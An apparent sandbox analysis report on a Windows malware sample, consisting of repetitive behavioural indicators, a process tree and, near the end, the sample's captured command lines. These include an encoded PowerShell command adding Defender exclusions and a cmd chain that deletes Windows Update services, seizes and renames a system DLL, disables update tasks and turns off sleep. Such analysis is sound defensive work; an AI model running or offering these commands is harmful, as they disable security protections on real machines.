Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2500 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2500 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2500 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1072 wrote to memory of 3144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 3144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4660 wrote to memory of 1008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 1008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 4872 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 4872 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 1380 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 1380 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4660 wrote to memory of 736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 2360 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 2360 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4660 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 4664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4660 wrote to memory of 4032 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 4032 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1072 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1072 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1072 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1072 wrote to memory of 548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2488 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2488 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2344 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 2344 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4048 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4048 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe

"C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

